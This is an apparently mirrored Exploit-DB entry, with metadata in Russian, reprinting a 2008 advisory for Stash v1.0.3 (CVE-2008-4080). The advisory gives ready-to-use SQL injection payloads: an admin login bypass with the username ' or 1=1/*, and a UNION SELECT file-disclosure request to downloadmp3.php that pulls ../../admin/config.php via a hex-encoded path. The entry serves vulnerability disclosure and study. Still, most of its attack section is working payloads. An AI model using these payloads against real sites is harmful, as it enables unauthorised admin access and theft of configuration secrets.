- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6402
- Проверка EDB
-
- Пройдено
- Автор
- KHASHAYAR FEREIDANI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4080
- Дата публикации
- 2008-09-09
Код:
#####################################################################################
#### Stash v1.0.3 Admin bypass / Remote File Disclosure ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
# #
#DORK : :( #
# #
#####################################################################################
# [Admin by pass] #
# #
#http://Site/[path]/admin/login #
#Username : ' or 1=1/* #
#Password : R3d.W0rm #
# #
#####################################################################################
# [Remote File Disclosure] #
# #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/*
# #
#Note : You must enter file name in hex in valun address to download it . #
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/*
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# milw0rm.com [2008-09-09]- Источник
- www.exploit-db.com
